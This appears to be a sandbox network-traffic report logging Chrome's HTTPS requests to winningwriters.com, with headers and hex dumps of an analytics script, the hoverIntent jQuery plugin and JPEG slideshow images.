                                                                                                                                                                                            Data Ascii: gY5PP?uBrUE.:IU/NV;*.vrnKvqFYRp6'0VC~Gzlq2]L7-6$QQ8huo%&[Xa)CT*Ex&;wnMIx7W@>svy;~e0|T


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            51192.168.2.164977466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC811OUTGET /assets/js/ga-track.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "937-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2359
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:08 UTC2359INData Raw: 2f 2a 0a 0a 66 72 6f 6d 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6c 61 73 74 61 6d 2e 63 6f 6d 2f 62 6c 6f 67 2f 69 6e 64 65 78 2e 70 68 70 2f 32 30 31 31 2f 30 34 2f 68 6f 77 2d 74 6f 2d 74 72 61 63 6b 2d 64 6f 77 6e 6c 6f 61 64 73 2d 69 6e 2d 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2f 0a 0a 54 72 61 63 6b 73 20 66 69 6c 65 20 64 6f 77 6e 6c 6f 61 64 73 20 61 73 20 65 76 65 6e 74 73 20 66 6f 72 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 78 74 65 6e 73 69 6f 6e 73 3a 20 2e 7a 69 70 2c 20 2e 65 78 65 2c 20 2e 70 64 66 2c 20 2e 64 6f 63 2c 20 2e 64 6f 63 78 2c 20 2e 78 6c 73 2c 20 2e 78 6c 73 78 2c 20 2e 70 70 74 2c 20 2e 70 70 74 78 2c 20 2e 6d 70 33 20 28 61 67 61 69 6e 20 66 65 65 6c 20 66 72 65 65 20 74 6f 20 6d 6f 64 69 66 79 20 74 68 65
                                                                                                                                                                                            Data Ascii: /*from: http://www.blastam.com/blog/index.php/2011/04/how-to-track-downloads-in-google-analytics/Tracks file downloads as events for the following extensions: .zip, .exe, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .mp3 (again feel free to modify the


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            52192.168.2.164977666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC814OUTGET /assets/js/hoverintent.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "c67-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3175
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:08 UTC3175INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 0a 09 2f 2a 20 68 6f 76 65 72 49 6e 74 65 6e 74 20 62 79 20 42 72 69 61 6e 20 43 68 65 72 6e 65 20 2a 2f 0a 09 24 2e 66 6e 2e 68 6f 76 65 72 49 6e 74 65 6e 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 20 7b 0a 09 09 2f 2f 20 64 65 66 61 75 6c 74 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 73 0a 09 09 76 61 72 20 63 66 67 20 3d 20 7b 0a 09 09 09 73 65 6e 73 69 74 69 76 69 74 79 3a 20 37 2c 0a 09 09 09 69 6e 74 65 72 76 61 6c 3a 20 31 30 30 2c 0a 09 09 09 74 69 6d 65 6f 75 74 3a 20 30 0a 09 09 7d 3b 0a 09 09 2f 2f 20 6f 76 65 72 72 69 64 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 73 20 77 69 74 68 20 75 73 65 72 20 73 75 70 70 6c 69 65 64 20 6f 62 6a 65 63 74 0a 09 09 63
                                                                                                                                                                                            Data Ascii: (function($){/* hoverIntent by Brian Cherne */$.fn.hoverIntent = function(f,g) {// default configuration optionsvar cfg = {sensitivity: 7,interval: 100,timeout: 0};// override configuration options with user supplied objectc


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            53192.168.2.164977766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC691OUTGET /graphics/tomstory/mcnamara_home_page_slide.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:08 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 19:39:29 GMT
                                                                                                                                                                                            ETag: "1f219-62474fecc88b6"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 127513
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyFhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 36 53 a0 b8 9e 56 9e e1 2a 20 b4 48 dd 62 41 c3 d0 72 ad 3e f3 80 7c 37 c1 28 16 b6 76 13 19 15 68 2a aa 1a a6 80 64 2b 45 3e 58 09 38 36 db d9 68 d7 ae b1 21 19 db c7 a9 98 f9 33 13 fb 00 c0 52 3b fb ba ec f6 d4 1b 26 c8 a8 fb d3 1d 32 5d 85 0f 15 9c 60 66 aa 4d 57 a8 41 c9 47 cb c4 e7 80 cc ed ae e4 86 de 1b 3c 95 35 99 9a a7 d7 23 b8 c9 8d 7c 30 03 11 fc a5 25 68 59 da 95 1c bc 70 0f 61 04 28 2b 93 1f dd 80 75 6a c3 a8 35 a8 1a 4e a2 47 96 02 4a 32 ef eb 03 4c 75 24 37 93 72 c0 28 24 5e 09 92 fe 26 38 07 08 55 94 d3 2a 73 3e 78 05 17 51 25 8d 5f 2a 60 0c 18 2b 57 8e 00 0d 6b 5c 00 d6 a7 8e 78 00 cb 01 df bb 00 55 e3 5c 01 8f 96 00 70 00 70 05 a9 c0 08 d4 df df 80 36 92 a2 b5 ae 01 1a 1e 78 02 3f 0c b0 0d d8 d4 d3 00 8c 85 40 3e 38 06 cb 5d 59 73 c0 32
                                                                                                                                                                                            Data Ascii: 6SV* HbAr>|7(vh*d+E>X86h!3R;&2]`fMWAG<5#|0%hYpa(+uj5NGJ2Lu$7r($^&8U*s>xQ%_*`+Wk\xU\pp6x?@>8]Ys2
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 5e 94 63 53 91 c6 87 00 79 6e c8 fc ab 6f cb 89 45 2a bc 5b cf 00 88 b9 9a 33 d4 12 b0 23 32 6a 4e 01 36 dd 2f 48 2a 1c 22 b7 1d 00 02 7e 27 00 84 34 32 12 49 ad 09 ae 01 cd c4 ad 15 a2 c4 32 ea 9d 6f e3 97 0c 02 b0 59 5c cc 82 45 4a 29 15 ab 1d 3c b2 e3 80 f6 5f e8 df b1 3b 76 c3 61 bb ef d3 73 6d b8 77 c6 e4 cf 6a 91 44 da e7 da 76 e5 a7 e5 10 78 49 31 1a e4 75 1c 34 a5 72 c0 6d 37 1d bf dc 7d bf dc c7 79 ec e8 ed e6 d8 b7 23 ff 00 9c 6c 4e c2 05 13 69 a7 d4 23 1c 81 f2 5c 03 c9 2c fb f3 79 74 4b bb b8 3b 7e c8 1f cd 5b 06 17 17 2e a4 7e 17 61 45 20 fe cc 03 f8 bb 47 b7 ac e5 4b db 88 3a d3 a5 0a 5c 5e c8 5e 85 79 8d 64 0e 18 09 95 b9 82 4d 11 c7 71 13 97 ce 34 49 10 ea 03 9a 80 73 fb 30 0a 7a 91 b9 86 1f 66 02 a1 b2 45 69 b5 77 f6 f7 65 68 bd 18 b7 08
                                                                                                                                                                                            Data Ascii: ^cSynoE*[3#2jN6/H*"~'42I2oY\EJ)<_;vasmwjDvxI1u4rm7}y#lNi#\,ytK;~[.~aE GK:\^^ydMq4Is0zfEiweh
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: e5 56 a9 c0 27 b3 a1 1b 5b 07 70 ed 7d a6 d8 b1 e3 a5 88 57 ff 00 ba ca 3f f9 b0 0f b7 fd ce d6 29 77 45 88 74 1e ce c2 28 90 b5 68 b7 72 b0 95 92 9c 28 23 e9 85 3f 1a e0 33 17 db cd ed ec b2 c9 ac c6 8c 02 c4 4a 22 c7 1d 2a 0c 8e e4 28 2d f3 e8 15 34 35 3e 18 09 fd 93 66 5b a9 4c 11 dc 14 4a 81 f4 f6 49 d6 95 97 8f f3 5f 40 0b e3 a1 30 1b ff 00 62 f6 65 92 47 01 1b 62 75 22 55 04 80 ee 18 8f 23 45 14 e7 41 80 da 36 4d 9d 23 51 45 64 23 e5 55 c8 fe ca e0 2d 30 d9 c6 80 51 73 1c d8 92 70 0e 05 be ac b3 3e 4b 96 01 64 b7 61 4a 0c fc 39 e0 1c 08 02 69 66 a0 7e 20 f2 a7 96 01 55 88 03 90 f2 a9 c0 0c 88 08 1c eb 80 49 61 cb 25 cc 71 18 02 ba 57 91 0d c8 8e 23 00 8b 45 53 a0 8c fc 79 60 1a cd 08 ce 87 d2 7c 70 11 97 36 c1 89 a8 e3 c4 73 cf 01 59 dd ec 55 d5 d7
                                                                                                                                                                                            Data Ascii: V'[p}W?)wEt(hr(#?3J"*(-45>f[LJI_@0beGbu"U#EA6M#QEd#U-0Qsp>KdaJ9if~ UIa%qW#ESy`|p6sYU
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 33 38 0d fb db 8f 64 76 d9 62 b2 bc ef 2b f3 63 b8 ee 41 56 36 40 93 db 6d c9 2d 0c 53 11 9e b9 10 d1 89 07 48 c0 7a fb db dd cf ba a0 ee ad 9b db ae f5 86 d7 6f ef 2e dd 86 6b 85 bd b5 21 2d 7b 8b 69 28 11 6f e0 4c a9 28 a2 ac d1 82 c5 5a bc 14 8c 06 dd 80 a5 7b b1 75 b3 58 f6 4d ed d6 f4 f1 c4 23 a4 96 12 48 40 65 b9 56 1a 59 2b 9e 42 ba 8f 86 00 92 f7 56 d7 37 b3 72 f7 87 78 c4 97 7d be 36 69 ae 37 d8 cc 2f 22 4d 6c a8 ca e7 a6 3d 45 5c 0e 5e 35 e1 80 f9 49 61 de 7b fe c3 fd 7e d3 b3 b7 3b ed 8b b7 bb 87 a9 0d de d9 6f 3b 28 96 c5 9c b4 71 4a 57 e6 d2 a7 4d 45 32 cb 86 02 3f 61 5d 97 fa f6 d2 bd c6 64 4e da fa db 61 bc 9b 75 2d 28 b1 ea af 5f 42 82 09 6d 15 c0 7b 3b f5 7b 6d ec 04 1e d4 6c 37 5d 85 0e cc fb d5 ed dc 0b da d3 ec 4d 18 64 db e3 0c d7 1d
                                                                                                                                                                                            Data Ascii: 38dvb+cAV6@m-SHzo.k!-{i(oL(Z{uXM#H@eVY+BV7rx}6i7/"Ml=E\^5Ia{~;o;(qJWME2?a]dNau-(_Bm{;{ml7]Md
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 95 72 c0 75 ad 9d bd ba b4 11 2b 28 14 2c c3 d4 58 8e 04 f3 3f 0c 02 c2 4a 81 50 68 a4 9a 50 ad 7f ec c0 07 ca 8c c2 a0 b7 e2 a7 e2 af 87 1f 86 00 b2 ca 13 d0 46 60 64 a4 d4 9a 9c 03 77 ab bf 8b f9 e5 5c 06 8b ed 1f b2 bd db ef 36 ef b8 59 76 e4 b6 fb 66 d5 b4 42 25 dd b7 db f0 e6 d2 07 90 16 8a 20 a9 ea 77 60 a5 8d 32 55 1a 9b cc 33 fb b8 16 da f2 e2 d6 3b 88 6f 23 b7 9e 58 12 f6 de a6 19 c4 4e c9 d4 8a a3 34 7a 6a 53 e1 4c 02 41 41 19 57 2e 24 73 c0 17 21 50 6b ab 88 3e 63 00 a3 02 d5 d4 fa b4 81 99 e2 72 e1 80 d4 fd bc f6 27 bc 7b fb b7 ae 7b b5 6e 2d b6 1e d1 24 ad 8e e5 7c a6 54 bc 74 72 92 98 a3 46 56 09 19 14 32 36 47 95 70 15 63 d8 77 36 bd db 65 da 5b f6 e9 69 b7 db df b0 11 6e ba cc 96 ac 09 d0 34 e5 5d 45 bd 21 4f 3c ab 80 b4 5a 7b 19 dc 76 3d
                                                                                                                                                                                            Data Ascii: ru+(,X?JPhPF`dw\6YvfB% w`2U3;o#XN4zjSLAAW.$s!Pk>cr'{{n-$|TtrFV26Gpcw6e[in4]E!O<Z{v=
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: a0 87 41 24 0c b3 18 06 1f f4 ce c5 6f 9c 30 49 d5 00 b0 97 53 54 e5 42 59 81 cf 21 80 34 fb 56 dd 79 02 5a dc c0 93 5b 2c 81 92 2b 95 eb c6 a4 57 d5 46 ae 7e 63 3c 03 18 7b 7a c6 c0 4f 26 dd 6b 67 6d 72 26 66 b7 b9 8e da 35 78 e2 71 5a 29 6a fa 94 f3 c0 31 bd da 2f f7 2b 75 8f 70 dc 0c 92 d3 4c d4 01 43 10 de 99 00 1c 09 f0 f0 c0 27 b4 76 75 b5 b3 2a 94 ea 46 00 d2 0e 64 3f 3a 1e 40 f8 60 2e 96 d6 1d 35 08 c3 d3 fc 27 96 01 dc 90 90 87 46 47 98 ad 30 11 db 82 ea 07 2c c7 1c 05 03 bd f6 81 bc 6c f7 16 ee a3 51 46 d1 95 73 a5 33 f8 8c b0 1e 35 dc 6c cc 37 13 59 b0 a1 81 d8 2a be 5a 94 1c c7 c4 71 18 06 2b 13 1f 48 ae 79 a9 f1 1c 30 0a ac 65 a3 aa 8a 0f 0f 2c 01 e3 5d 0f e9 3e a1 cf 01 25 02 bc 82 ad 98 19 67 80 b0 6d 57 8f b7 dd c5 32 28 d4 08 2a 1c 1d 2c
                                                                                                                                                                                            Data Ascii: A$o0ISTBY!4VyZ[,+WF~c<{zO&kgmr&f5xqZ)j1/+upLC'vu*Fd?:@`.5'FG0,lQFs35l7Y*Zq+Hy0e,]>%gmW2(*,
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: c8 cf b7 96 93 33 72 59 ff 00 21 72 59 29 c6 b4 04 30 09 61 9e da 79 ad 2e 61 92 de f2 de 47 86 e2 de 65 31 cb 14 b1 92 af 1b a3 00 55 94 8a 10 78 60 0d 0c 13 dc 4a 90 5a c4 f3 dc c8 69 1c 10 a9 92 46 a0 ae 4a a0 93 90 ae 00 a1 45 32 ab 16 15 1a 70 0b db c9 35 bc 91 dc 42 da 6e 62 75 78 9c 50 95 65 35 06 9e 47 00 ac f7 13 5d 4f 3d d5 c1 0d 75 3b bc 93 30 50 81 9d 8d 4b 05 5a 00 3c 86 01 24 04 1d 49 97 88 15 00 13 fb f0 0a 10 fa 50 f0 6a 56 b5 3c 39 60 0e 75 19 0a d4 12 b4 15 19 12 1b 3a 92 38 e0 01 96 a0 ae 91 43 55 14 fe 2f 12 70 0f 76 fb cd cb 65 bc b6 de 76 7b c9 f6 fd d6 da bf 4b 77 6b 21 86 78 b5 a1 8d b4 b8 a1 15 56 2a 7c b0 0c d0 e8 1a 12 30 13 e6 60 dc 33 cf e3 e6 70 04 d3 a3 54 8e 45 06 40 8a fa ab ca 9c 86 02 db d8 2c 92 6e b7 01 73 56 80 ab 46
                                                                                                                                                                                            Data Ascii: 3rY!rY)0ay.aGe1Ux`JZiFJE2p5BnbuxPe5G]O=u;0PKZ<$IPjV<9`u:8CU/pvev{Kwk!xV*|0`3pTE@,nsVF
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: 10 5b b2 0f 9c 8d ba d9 54 3b 70 34 d5 31 a0 e0 78 e0 15 ed b1 1a da 8b 44 66 9d e3 4d 3a db e6 39 83 90 34 d4 ab 9d 0e 02 ff 00 6d 39 b7 db a5 bf 65 8f a8 b0 4d 2d 69 a9 09 10 b8 06 99 7c be 38 0f 2a 46 26 4b 68 9e 54 aa 28 1a dc 1c 89 a7 13 e2 6b cf 01 17 77 22 c8 46 8e 0a 4d 08 c8 67 9e 58 06 12 cb 40 ce e6 80 54 b3 1f 01 80 f4 37 69 77 2f b8 1e da 7b 5f b2 6c ab d9 46 f6 c7 73 6b 8d fe ca fe d2 e5 5a 69 46 e3 4d 02 e6 de 9a 91 95 14 00 05 7d 3c b3 c0 2b b7 f6 c4 dd cd 2f d6 7b ff 00 ee 2d af 64 f6 f5 0d d4 3d a3 67 76 b0 5d 3a c8 34 6a 97 46 ad 21 86 5a 68 ed f0 c0 68 9d b3 dc df a2 5e c1 85 ed f6 0b 38 77 69 92 05 5b bb f3 b5 df 6f 72 f4 e4 35 d3 24 b2 44 51 2a 47 ca 02 e0 1e 77 77 bc 5f a7 7e e7 d8 27 ed 28 fb 45 da eb 78 db e6 b7 d8 8d f7 6d 8b 28
                                                                                                                                                                                            Data Ascii: [T;p41xDfM:94m9eM-i|8*F&KhT(kw"FMgX@T7iw/{_lFskZiFM}<+/{-d=gv]:4jF!Zhh^8wi[or5$DQ*Gww_~'(Exm(
                                                                                                                                                                                            2024-11-18 20:00:09 UTC8000INData Raw: a6 fd 42 46 a0 0d 28 29 e3 80 31 42 84 33 ad 55 c0 0c 0f 1d 5f 87 98 a1 1e 58 0b b7 b6 5b 74 77 3b ed e4 4e df 92 96 65 d9 4d 4f 07 8e b5 a7 88 3c 46 03 69 d9 61 b3 b1 51 0c 2d f9 08 00 80 20 07 25 39 2d 46 01 29 a6 51 ba bc ca 29 0a 1f 9f 8e 64 66 0d 7c f0 0f a4 bf db ec 67 12 6e 37 b1 da c1 40 ea 65 91 22 5a f1 22 ae 40 f3 c0 67 7d ed ee 5f 6d 0b c8 e6 d8 6e ce e5 79 0b 32 1f a7 0d d1 e8 c8 0a c9 19 95 a8 0e aa 54 e9 f2 a6 03 37 bf ee 99 37 45 ba 8d ad d6 da 07 22 56 20 d4 f5 4e 44 8e 15 2d 4e 78 0a f4 53 43 73 68 db 74 49 d3 3a f5 69 a8 ac ad 5c c1 6e 5e 40 70 c0 4d c1 60 cf 1a 8b e4 d5 63 77 44 4b 91 4d 71 ca 06 98 dc 30 fc 43 f9 6f e3 80 af 6e 96 af b7 4c db 7b 2d 11 46 a4 96 bf cc ae 5a bc a9 c0 8f b7 00 4d aa 71 67 79 1e a2 b2 4b 19 c9 f3 d0 85 f2
                                                                                                                                                                                            Data Ascii: BF()1B3U_X[tw;NeMO<FiaQ- %9-F)Q)df|gn7@e"Z"@g}_mny2T77E"V ND-NxSCshtI:i\n^@pM`cwDKMq0ConL{-FZMqgyK


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            54192.168.2.164977966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:09 UTC684OUTGET /graphics/tompoetry/hagen_slide_show.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:09 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:09 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 14 Apr 2024 17:32:08 GMT
                                                                                                                                                                                            ETag: "1a882-61611e2594b7f"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 108674
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:09 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:09 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 64 62 61 33 64 61 33 62 35 2c 20 32 30 32 33 2f 31 32 2f 31 35 2d 31 30 3a 34 32 3a 33 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF
